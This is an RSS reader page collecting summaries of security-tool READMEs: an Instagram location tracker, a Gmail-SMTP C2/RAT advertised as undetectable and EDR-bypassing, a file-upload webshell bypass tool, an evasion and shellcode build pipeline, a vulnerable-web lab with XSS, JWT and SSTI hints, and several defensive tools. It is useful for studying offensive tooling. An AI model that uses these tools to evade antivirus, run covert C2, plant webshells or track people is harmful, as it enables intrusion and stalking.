FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Tracgram - Use Instagram Location Features To Track An Account


Trackgram Use Instagram location features to track an account

Usage

At this moment the usage of Trackgram is extremly simple:

1. Download this repository

2. Go through the instalation steps

3. Change the parameters in the tracgram main method directly:
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your instagram password
- OBJECTIVE: your objective username

+ Optional:
- path_to_csv: the path were the csv file will be stored, including the name


4. Execute it with python3 tracgram.py

Installation steps

  1. Download with $ git clone https://github.com/initzerCreations/Tracgram

  2. Install dependencies using pip install -r requirements.txt

  3. Congrats! by now you should be able to run it: python3 tracgram.py

Screenshots

Features

  1. Provides a heatmap based on the location frequency

  2. Markers displayed on the heatmap indicating:

    • Exact location name
    • Time when relate post was made
    • Link to Google Maps address
  3. Graph relating the posts count for an specific location

  4. Generate a easy to process .CSV file



Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


 A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
and Network Traffic Restrictions


Note:

 This RAT communicates Via Gmail SMTP (or u can use any other smtps as well) but Gmail SMTP is valid
because most of the companies block unknown traffic so gmail traffic is valid and allowed everywhere.

Warning:

 1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work
with Time.
2. Virustotal Share Signatures With AV Comapnies.
3. Again Don't be an Idiot!

How To Setup

 1. Create Two seperate Gmail Accounts.
2. Now enable SMTP On Both Accounts (check youtube if u don't know)
3. Suppose you have already created Two Seperate Gmail Accounts With SMTP enabled
A -> first account represents Your_1st_gmail@gmail.com
B -> 2nd account represents your_2nd_gmail@gmail.com
4. Now Go To server.py file and fill the following at line 67:
smtpserver="smtp.gmail.com" (don't change this)
smtpuser="Your_1st_gmail@gmail.com"
smtpkey="your_1st_gmail_app_password"
imapserver="imap.gmail.com" (don't change this)
imapboy="your_2nd_gmail@gmail.com"
5. Now Go To client.py file and fill the following at line 16:
imapserver = "imap.gmail.com" (dont change this)
username = "your_2nd_gmail@gmail.com"
password = "your2ndgmailapp password"
getting = "Your_1st_gmail@gmail.com"
smtpserver = "smtp.gmail.com" (don 't change this)
6. Enjoy

How To Run:-

 *:- For Windows:-
1. Make Sure python3 and pip is installed and requriements also installed
2. python server.py (on server side)


*:- For Linux:-
1. Make Sure All Requriements is installed.
2. python3 server.py (on server side)

C2 Feature:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added

Features:-

1) FUD Ratio 0/40
2) Bypass Any EDR's Solutions
3) Bypass Any Network Restrictions
4) Commands Are Being Sent in Base64 And Decoded on server side
5) No More Tcp Shits

Warning:-

Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetrations tests, red teams exercises, and other great activities, there is always a room when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find out the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bugbounty programs, that were collected by chaos.projectdiscovery.io, bounty-targets-data or that just had responsible disclosure programs with a total number of 4095 domains! If subdomains appear more than in 5-10 different scopes, they will be put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less< /strong>.

You can find complete list of sources here

Lists

Subdomains

In these lists you will find most popular subdomains as is.

Name Words count Size
subdomains.txt.gz 21901389 501MB
subdomains_top100.txt 100 706B
subdomains_top1000.txt 1000 7.2KB
subdomains_top10000.txt 10000 70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. F.E - dev.stg subdomain will be split into two words dev and stg. dev will have level = 2, stg - level = 1. You can use these wordlists for combinatory attacks for subdomain searches. There are several types of level.txt wordlists that follow the idea of subdomains.

Name Words count Size
level_1.txt.gz 8096054 153MB
level_2.txt.gz 7556074 106MB
level_3.txt.gz 1490999 18MB
level_4.txt.gz 205969 3.2MB
level_5.txt.gz 71716 849KB
level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6K
level_2_top100.txt 100 550B
level_2_top1000.txt 1000 5.6KB
level_3_top100.txt 100 531B
level_3_top1000.txt 1000 5.1KB
level_4_top100.txt 100 525B
level_4_top1000.txt 1000 5.0KB
level_5_top100.txt 100 449B
level_5_top1000.txt 1000 5.0KB

Popular splitted subdomains

In these lists, you will find the most popular splitted words from subdomains on all levels. For example - dev.stg subdomain will be splitted in two words dev and stg.

Name Words count Size
words.txt.gz 17229401 278MB
words_top100.txt 100 597B
words_top1000.txt 1000 5.5KB
words_top10000.txt 10000 62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



Reverseip_Py - Domain Parser For IPAddress.com Reverse IP Lookup


Domain parser for IPAddress.com Reverse IP Lookup. Writen in Python 3.

What is Reverse IP?

Reverse IP refers to the process of looking up all the domain names that are hosted on a particular IP address. This can be useful for a variety of reasons, such as identifying all the websites that are hosted on a shared hosting server or finding out which websites are hosted on the same IP address as a particular website.


Requirements

  • beautifulsoup4
  • requests
  • urllib3

Tested on Debian with Python 3.10.8

Install Requirements

pip3 install -r requirements.txt

How to Use

Help Menu

python3 reverseip.py -h
usage: reverseip.py [-h] [-t target.com]

options:
-h, --help show this help message and exit
-t target.com, --target target.com
Target domain or IP

Reverse IP

python3 reverseip.py -t google.com

Disclaimer

Any actions and or activities related to the material contained within this tool is solely your responsibility.The misuse of the information in this tool can result in criminal charges brought against the persons in question.

Note: modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by author of this tool (yuyudhn).



Faraday - Open Source Vulnerability Management Platform


Security has two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve remediation efforts. With Faraday, you may focus on discovering vulnerabilities while we help you with the rest. Just use it in your terminal and get your work organized on the run. Faraday was made to let you take advantage of the available tools in the community in a truly multiuser way.

Faraday aggregates and normalizes the data you load, allowing exploring it into different visualizations that are useful to managers and analysts alike.

To read about the latest features check out the release notes!


Install

Docker-compose

The easiest way to get faraday up and running is using our docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml
$ docker-compose up

If you want to customize, you can find an example config over here Link

Docker

You need to have a Postgres running first.

 $ docker run \
-v $HOME/.faraday:/home/faraday/.faraday \
-p 5985:5985 \
-e PGSQL_USER='postgres_user' \
-e PGSQL_HOST='postgres_ip' \
-e PGSQL_PASSWD='postgres_password' \
-e PGSQL_DBNAME='postgres_db_name' \
faradaysec/faraday:latest

PyPi

$ pip3 install faradaysec
$ faraday-manage initdb
$ faraday-server

Binary Packages (Debian/RPM)

You can find the installers on our releases page

$ sudo apt install faraday-server_amd64.deb
# Add your user to the faraday group
$ faraday-manage initdb
$ sudo systemctl start faraday-server

Add your user to the faraday group and then run

Source

If you want to run directly from this repo, this is the recommended way:

$ pip3 install virtualenv
$ virtualenv faraday_venv
$ source faraday_venv/bin/activate
$ git clone git@github.com:infobyte/faraday.git
$ pip3 install .
$ faraday-manage initdb
$ faraday-server

Check out our documentation for detailed information on how to install Faraday in all of our supported platforms

For more information about the installation, check out our Installation Wiki.

In your browser now you can go to http://localhost:5985 and login with "faraday" as username, and the password given by the installation process

Getting Started

Learn about Faraday holistic approach and rethink vulnerability management.

Integrating faraday in your CI/CD

Setup Bandit and OWASP ZAP in your pipeline

Setup Bandit, OWASP ZAP and SonarQube in your pipeline

Faraday Cli

Faraday-cli is our command line client, providing easy access to the console tools, work in faraday directly from the terminal!

This is a great way to automate scans, integrate it to CI/CD pipeline or just get metrics from a workspace

$ pip3 install faraday-cli

Check our faraday-cli repo

Check out the documentation here.


Faraday Agents

Faraday Agents Dispatcher is a tool that gives Faraday the ability to run scanners or tools remotely from the platform and get the results.

Plugins

Connect you favorite tools through our plugins. Right now there are more than 80+ supported tools, among which you will find:


Missing your favorite one? Create a Pull Request!

There are two Plugin types:

Console plugins which interpret the output of the tools you execute.

$ faraday-cli tool run \"nmap www.exampledomain.com\"
รฐลธโ€™ยป Processing Nmap command
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-22 14:13 -03
Nmap scan report for www.exampledomain.com (10.196.205.130)
Host is up (0.17s latency).
rDNS record for 10.196.205.130: 10.196.205.130.bc.example.com
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
2222/tcp open EtherNetIP-1
3306/tcp closed mysql
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
รขยฌโ€  Sending data to workspace: test
รขล“โ€ Done

Report plugins which allows you to import previously generated artifacts like XMLs, JSONs.

faraday-cli tool report burp.xml

Creating custom plugins is super easy, Read more about Plugins.

API

You can access directly to our API, check out the documentation here.

Links



ThreatHound - Tool That Help You On Your IR & Threat Hunting And CA


This tool will help you on your IR & Threat Hunting & CA. just drop your event log file and anlayze the results.


New Release Features:

  • support windows (ThreatHound.exe)
  • C for Linux based
  • new vesion available in C also
  • now you can save results in json file or print on screen it as you want by arg 'print' "'yes' to print the results on screen and 'no' to save the results on json file"
  • you can give windows event logs folder or single evtx file or multiple evtx separated by comma by arg -p
  • you can now give sigam ruels path by arg -s
  • add multithreading to improve runing speed
  • ThreatHound.exe is agent based you can push it and run it on multiple servers
  • Example:
$ ThreatHound.exe -s ..\sigma_rules\ -p C:\Windows\System32\winevt\Logs\ -print no
  • NOTE: give cmd full promission to read from "C:\Windows\System32\winevt\Logs"

  • Linux Based:

  • Windows Based

Iโ€™ve built the following:

  • A dedicated backend to support Sigma rules for python
  • A dedicated backend for parsing evtx for python
  • A dedicated backend to match between evtx and the Sigma rules

Features of the tool:

  • Automation for Threat hunting, Compromise Assessment, and Incident Response for the Windows Event Logs
  • Downloading and updating the Sigma rules daily from the source
  • More then 50 detection rules included
  • support for more then 1500 detection rules for Sigma
  • Support for new sigma rules dynamically and adding it to the detection rules
  • Saving of all the outputs in JSON format
  • Easily add any detection rules you prefer
  • you can add new event log source type in mapping.py easily

To-do:

  • Support for Sigma rules dedicated for DNS query
  • Modifying the speed of algorithm dedicated for the detection and making it faster
  • Adding JSON output that supports Splunk
  • More features

installiton:

$ git clone https://github.com/MazX0p/ThreatHound.git
$ cd ThreatHound
$ pip install - r requirements.txt
$ pyhton3 ThreatHound.py
  • Note: glob doesn't support get path of the directory if it has spaces on folder names, please ensure the path of the tool is without spaces (folders names)

Demo:

https://player.vimeo.com/video/784137549?h=6a0e7ea68a&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479

Screenshots:



Upload_Bypass_Carnage - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!


File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques!

POC video:

File upload restrictions bypass by using different bug bounty techniques! Tool must be running with all its assets!


Installation:

pip3 install -r requirements.txt

Usage: upload_bypass.py [options]

Options: -h, --help

  show this help message and exit

-u URL, --url=URL

  Supply the login page, for example: -u http://192.168.98.200/login.php'

-s , --success

 Success message when upload an image, example: -s 'Image uploaded successfully.'

-e , --extension

 Provide server backend extension, for example: --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a , --allowed

 Provide allowed extensions to be uploaded, for example: php,asp,jsp,perl

-H , --header

 (Optional) - for example: '"X-Forwarded-For":"10.10.10.10"' - Use double quotes around the data and wrapp it all with single quotes. Use comma to separate multi headers.

-l , --location

 (Optional) - Supply a remote path where the webshell suppose to be. For exmaple: /uploads/

-S, --ssl

 (Optional) - No checks for TLS or SSL

-p, --proxy

 (Optional) - Channel the requests through proxy

-c, --continue

 (Optional) - If set, the brute force will continue even if one or more methods found!

-v, --verbose

 (Optional) - Printing the http response in terminal

-U , --username

 (Optional) - Username for authentication. For exmaple: --username admin

-P , --password

 (Optional) - - Password for authentication. For exmaple: --password 12345


OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises


OfensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises.
A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.


Features

  • Currently only supports C# (.Net Framework) projects
  • Allows to clone public and private (you will need credentials :D) git repositories
  • Allows to work with local folders
  • Randomizes project GUIDs
  • Randomizes application information contained in AssemblyInfo
  • Builds C# projects
  • Obfuscates generated binaries
  • Generates shellcodes from binaries
  • There are 79 tools parameterised in YML templates (not all of them may work :D)
  • New tools can be added using YML templates
  • It should be easy to add new plugins...

What's new in version 2.0

  • Almost complete code rewrite (new bugs?)
  • Cloning from private repositories possible (authentication via GitHub authToken)
  • Possibility to copy a local folder instead of cloning from a remote repository
  • New module to generate shellcodes with Donut
  • New module to randomize GUIDs of applications
  • New module to randomize the AssemblyInfo of each application
  • 60 new tools added

Examples

  • List all tools:
OffensivePipeline.exe list
  • Build all tools:
OffensivePipeline.exe all
  • Build a tool
OffensivePipeline.exe t toolName
  • Clean cloned and build tools
OffensivePipeline.exe 

Output example

PS C:\OffensivePipeline> .\OffensivePipeline.exe t rubeus

ooo
.osooooM M
___ __ __ _ ____ _ _ _ +y. M M
/ _ \ / _|/ _| ___ _ __ ___(_)_ _____| _ \(_)_ __ ___| (_)_ __ ___ :h .yoooMoM
| | | | |_| |_ / _ \ '_ \/ __| \ \ / / _ \ |_) | | '_ \ / _ \ | | '_ \ / _ \ oo oo
| |_| | _| _| __/ | | \__ \ |\ V / __/ __/| | |_) | __/ | | | | | __/ oo oo
\___/|_| |_| \___|_| |_|___/_| \_/ \___|_| |_| .__/ \___|_|_|_| |_|\___| oo oo
|_| MoMoooy. h:
M M .y+
M Mooooso.
ooo

@aetsu
v2.0.0


[+] Loading tool: Rubeus
Clonnig repository: Rubeus into C:\OffensivePipeline\Git\Rubeus
Repository Rubeus cloned into C:\OffensivePipeline\Git\Rubeus

[+] Load RandomGuid module
Searching GUIDs...
> C:\OffensivePipeline\Git\Rubeus\Rubeus.sln
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj
> C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
Replacing GUIDs...
File C:\OffensivePipeline\Git\Rubeus\Rubeus.sln:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Rubeus.csproj:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!
File C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs:
> Replacing GUID 658C8B7F-3664-4A95-9572-A3E5871DFC06 with 3bd82351-ac9a-4403-b1e7-9660e698d286
> Replacing GUID FAE04EC0-301F-11D3-BF4B-00C04F79EFBC with 619876c2-5a8b-4c48-93c3-f87ca520ac5e
> Replacing GUID 658c8b7f-3664-4a95-9572-a3e5871dfc06 with 11e0084e-937f-46d7-83b5-38a496bf278a
[+] No errors!


[+] Load RandomAssemblyInfo module
Replacing strings in C:\OffensivePipeline\Git\Rubeus\Rubeus\Properties\AssemblyInfo.cs
[assembly: AssemblyTitle("Rubeus")] -> [assembly: AssemblyTitle("g4ef3fvphre")]
[assembly: AssemblyDescription("")] -> [assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")] -> [assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")] -> [assembly: AssemblyCompany("")]
[assembly: AssemblyProduc t("Rubeus")] -> [assembly: AssemblyProduct("g4ef3fvphre")]
[assembly: AssemblyCopyright("Copyright ยฉ 2018")] -> [assembly: AssemblyCopyright("Copyright ยฉ 2018")]
[assembly: AssemblyTrademark("")] -> [assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")] -> [assembly: AssemblyCulture("")]


[+] Load BuildCsharp module
[+] Checking requirements...
[*] Downloading nuget.exe from https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
[+] Download OK - nuget.exe
[+] Path found - C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat
Solving dependences with nuget...
Building solution...
[+] No errors!
[+] Output folder: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


[+] Load ConfuserEx module
[+] Checking requirements...
[+] Downloading ConfuserEx from https://github.com/mkaring/ConfuserEx/releases/download/v1.6.0/ConfuserEx-CLI.zip
[+] Download OK - ConfuserEx
Confusing...
[+] No errors!


[+] Load Donut module
Generating shellcode...

Payload options:
Domain: RMM6XFC3
Runtime:v4.0.30319

Raw Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin
B64 Payload: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud\ConfuserEx\Donut\Rubeus.bin.b64

[+] No errors!


[+] Generating Sha256 hashes
Output file: C:\OffensivePipeline\Output\Rubeus_vh00nc50xud


-----------------------------------------------------------------
SUMMARY

- Rubeus
- RandomGuid: OK
- RandomAssemblyInfo: OK
- BuildCsharp: OK
- ConfuserEx: OK
- Donut: OK

-----------------------------------------------------------------

Plugins

  • RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
  • RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
  • BuildCsharp: build c# project
  • ConfuserEx: obfuscate c# tools
  • Donut: use Donut to generate shellcodes. The shellcode generated is without parameters, in future releases this may be changed.

Add a tool from a remote git

The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:

  • Rubeus.yml file:
tool:
- name: Rubeus
description: Rubeus is a C# toolset for raw Kerberos interaction and abuses
gitLink: https://github.com/GhostPack/Rubeus
solutionPath: Rubeus\Rubeus.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser:
authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to use on this tool build process
  • AuthUser: user name from github (not used for public repositories)
  • AuthToken: auth token from github (not used for public repositories)

Add a tool from a private git

tool:
- name: SharpHound3-Custom
description: C# Rewrite of the BloodHound Ingestor
gitLink: https://github.com/aaaaaaa/SharpHound3-Custom
solutionPath: SharpHound3-Custom\SharpHound3.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser: aaaaaaa
authToken: abcdefghijklmnopqrsthtnf

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: link from git to clone
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to user on this tool build process
  • AuthUser: user name from GitHub
  • AuthToken: auth token from GitHub (documented at GitHub: creating a personal access token)

Add a tool from local git folder

tool:
- name: SeatbeltLocal
description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
gitLink: C:\Users\alpha\Desktop\SeatbeltLocal
solutionPath: SeatbeltLocal\Seatbelt.sln
language: c#
plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
authUser:
authToken:

Where:

  • Name: name of the tool
  • Description: tool description
  • GitLink: path where the tool is located
  • SolutionPath: solution (sln file) path
  • Language: language used (currently only c# is supported)
  • Plugins: plugins to user on this tool build process
  • AuthUser: user name from github (not used for local repositories)
  • AuthToken: auth token from github (not used for local repositories)

Requirements for the release version (Visual Studio 2019/2022 is not required)

In the OffensivePipeline.dll.config file it's possible to change the version of the build tools used.

  • Build Tools 2019:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\Common7\Tools\VsDevCmd.bat"/>
  • Build Tools 2022:
<add key="BuildCSharpTools" value="C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\Common7\Tools\VsDevCmd.bat"/>

Requirements for build

Credits

Supported tools



Misp-Extractor - Tool That Connects To A MISP Instance And Retrieves Attributes Of Specific Types (Such As IP Addresses, URLs, And Hashes)


This code connects to a given MISP (Malware Information Sharing Platform) server and parses a given number of events, writing the IP addresses, URLs, and MD5 hashes found in the events to three separate files.


Usage

To use this script, you will need to provide the URL of your MISP instance and a valid API key. You can then call the MISPConnector.run() method to retrieve the attributes and save them to files.

To use the code, run the following command:

python3 misp_connector.py --misp-url <MISP_URL> --misp-key <MISP_API_KEY> --limit <EVENT_LIMIT>

Supported attribute types

The MISPConnector class currently supports the following attribute types:

  • ip-src
  • ip-dst
  • md5
  • url
  • domain

If an attribute of one of these types is found in an event, it will be added to the appropriate set (for example, IP addresses will be added to the network_set) and written to the corresponding file (network.txt, hash.txt, or url.txt).

Configuration

The code can be configured by passing arguments to the command-line script. The available arguments are:

  • misp-url: The URL of the MISP server. This argument is required.
  • misp-key: The API key for the MISP server. This argument is required.
  • limit: The maximum number of events to parse. The default is 2000.

Limitations

This script has the following limitations:

  • It only retrieves attributes of specific types (as listed above).
  • It only writes the retrieved attributes to files, without any further processing or analysis.
  • It only retrieves a maximum of 2000 events, as specified by the limit parameter in the misp.search() method.

License

This code is provided under the MIT License. See the LICENSE file for more details.



Web-Hacking-Playground - Web Application With Vulnerabilities Found In Real Cases, Both In Pentests And In Bug Bounty Programs


Web Hacking Playground is a controlled web hacking environment. It consists of vulnerabilities found in real cases, both in pentests and in Bug Bounty programs. The objective is that users can practice with them, and learn to detect and exploit them.

Other topics of interest will also be addressed, such as: bypassing filters by creating custom payloads, executing chained attacks exploiting various vulnerabilities, developing proof-of-concept scripts, among others.


Important

The application source code is visible. However, the lab's approach is a black box one. Therefore, the code should not be reviewed to resolve the challenges.

Additionally, it should be noted that fuzzing (both parameters and directories) and brute force attacks do not provide any advantage in this lab.

Setup

It is recommended to use Kali Linux to perform this lab. In case of using a virtual machine, it is advisable to use the VMware Workstation Player hypervisor.

The environment is based on Docker and Docker Compose, so it is necessary to have both installed.

To install Docker on Kali Linux, run the following commands:

sudo apt update -y
sudo apt install -y docker.io
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

To install Docker on other Debian-based distributions, run the following commands:

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo systemctl enable docker --now
sudo usermod -aG docker $USER

It is recommended to log out and log in again so that the user is recognized as belonging to the docker group.

To install Docker Compose, run the following command:

sudo apt install -y docker-compose

Note: In case of using M1 it is recommended to execute the following command before building the images:

export DOCKER_DEFAULT_PLATFORM=linux/amd64

The next step is to clone the repository and build the Docker images:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose build

Also, it is recommended to install the Foxy Proxy browser extension, which allows you to easily change proxy settings, and Burp Suite, which we will use to intercept HTTP requests.

We will create a new profile in Foxy Proxy to use Burp Suite as a proxy. To do this, we go to the Foxy Proxy options, and add a proxy with the following configuration:

  • Proxy Type: HTTP
  • Proxy IP address: 127.0.0.1
  • Port: 8080

Deployment

Once everything you need is installed, you can deploy the environment with the following command:

git clone https://github.com/takito1812/web-hacking-playground.git
cd web-hacking-playground
docker-compose up -d

This will create two containers of applications developed in Flask on port 80:

  • The vulnerable web application (Socially): Simulates a social network.
  • The exploit server: You should not try to hack it, since it does not have any vulnerabilities. Its objective is to simulate a victim's access to a malicious link.

Important

It is necessary to add the IP of the containers to the /etc/hosts file, so that they can be accessed by name and that the exploit server can communicate with the vulnerable web application. To do this, run the following commands:

sudo sed -i '/whp-/d' /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-socially) whp-socially" | sudo tee -a /etc/hosts
echo "$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' whp-exploitserver) whp-exploitserver" | sudo tee -a /etc/hosts

Once this is done, the vulnerable application can be accessed from http://whp-socially and the exploit server from http://whp-exploitserver.

When using the exploit server, the above URLs must be used, using the domain name and not the IPs. This ensures correct communication between containers.

When it comes to hacking, to represent the attacker's server, the local Docker IP must be used, since the lab is not intended to make requests to external servers such as Burp Collaborator, Interactsh, etc. A Python http.server can be used to simulate a web server and receive HTTP interactions. To do this, run the following command:

sudo python3 -m http.server 80

Stages

The environment is divided into three stages, each with different vulnerabilities. It is important that they are done in order, as the vulnerabilities in the following stages build on those in the previous stages. The stages are:

  • Stage 1: Access with any user
  • Stage 2: Access as admin
  • Stage 3: Read the /flag file

Important

Below are spoilers for each stage's vulnerabilities. If you don't need help, you can skip this section. On the other hand, if you don't know where to start, or want to check if you're on the right track, you can extend the section that interests you.

Stage 1: Access with any user

Display

At this stage, a specific user's session can be stolen through Cross-Site Scripting (XSS), which allows JavaScript code to be executed. To do this, the victim must be able to access a URL in the user's context, this behavior can be simulated with the exploit server.

The hints to solve this stage are:

  • Are there any striking posts on the home page?
  • You have to chain two vulnerabilities to steal the session. XSS is achieved by exploiting an Open Redirect vulnerability, where the victim is redirected to an external URL.
  • The Open Redirect has some security restrictions. You have to find how to get around them. Analyze which strings are not allowed in the URL.
  • Cookies are not the only place where session information is stored. Reviewing the source code of the JavaScript files included in the application can help clear up doubts.

Stage 2: Access as admin

Display

At this stage, a token can be generated that allows access as admin. This is a typical JSON Web Token (JWT) attack, in which the token payload can be modified to escalate privileges.

The hint to solve this stage is that there is an endpoint that, given a JWT, returns a valid session cookie.

Stage 3: Read the /flag file

Display

At this stage, the /flag file can be read through a Server Site Template Injection (SSTI) vulnerability. To do this, you must get the application to run Python code on the server. It is possible to execute system commands on the server.

The hints to solve this stage are:

  • Vulnerable functionality is protected by two-factor authentication. Therefore, before exploiting the SSTI, a way to bypass the OTP code request must be found. There are times when the application trusts the requests that are made from the same server and the HTTP headers play an important role in this situation.

  • The SSTI is Blind, this means that the output of the code executed on the server is not obtained directly. The Python smtpd module allows you to create an SMTP server that prints messages it receives to standard output:

    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

  • The application uses Flask, so it can be inferred that the template engine is Jinja2 because it is recommended by the official Flask documentation and is widely used. You must get a Jinja2 compatible payload to get the final flag.

  • The email message has a character limitation. Information on how to bypass this limitation can be found on the Internet.

Solutions

Detailed solutions for each stage can be found in the Solutions folder.

Resources

The following resources may be helpful in resolving the stages:

Collaboration

Pull requests are welcome. If you find any bugs, please open an issue.



Invoke-Transfer - PowerShell Clipboard Data Transfer

Invoke-Transfer

Invoke-Transfer is a PowerShell Clipboard Data Transfer.

This tool helps you to send files in highly restricted environments such as Citrix, RDP, VNC, Guacamole.. using the clipboard function.

As long as you can send text through the clipboard, you can send files in text format, in small Base64 encoded chunks. Additionally, you can transfer files from a screenshot, using the native OCR function of Microsoft Windows.

Requirements

  • Powershell 5.1
  • Windows 10 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/Invoke-Transfer

Usage

.\Invoke-Transfer.ps1 -h

___ _ _____ __
|_ _|_ __ _ __ __ | | __ __ |_ _| __ __ _ _ __ ___ / _| ___ _ __
| || '_ \ \ / / _ \| |/ / _ \____| || '__/ _' | '_ \/ __| |_ / _ \ '__|
| || | | \ V / (_) | < __/____| || | | (_| | | | \__ \ _| __/ |
|___|_| |_|\_/ \___/|_|\_\___| |_||_| \__,_|_| |_|___/_| \___|_|

----------------------- by @JoelGMSec & @3v4Si0N ---------------------


Info: This tool helps you to send files in highly restricted environments
such as Citrix, RDP, VNC, Guacamole... using the clipboard function

Usage: .\Invoke-Transfer.ps1 -split {FILE} -sec {SECONDS}
Send 120KB chunks with a set time delay of seconds
Add -guaca to send files through Apache Guacamole

.\Invoke-Transfer.ps1 -merge {B64FILE} -out {FILE}
Merge Base64 file into original file in de sired path

.\Invoke-Transfer.ps1 -read {IMGFILE} -out {FILE}
Read screenshot with Windows OCR and save output to file

Warning: This tool only works on Windows 10 or greater
OCR reading may not be entirely accurate

The detailed guide of use can be found at the following link:

https://darkbyte.net/transfiriendo-ficheros-en-entornos-restringidos-con-invoke-transfer

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec) and Hรฉctor de Armas Padrรณn (@3v4si0n).

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find us on Twitter as @JoelGMSec, @3v4si0n and on my blog darkbyte.net.



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerablity Of Domains


Verify whether the domain is vulnerable to spoofing by Email-vulnerablity-checker

Features

  • This tool will automatically tells you if the domain is email spoofable or not
  • you can do single and multiple domain input as well (for multiple domain checker you need to have text file with domains in it)

Usage:

Clone the package by running:

git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

Step 1. Install Requirements

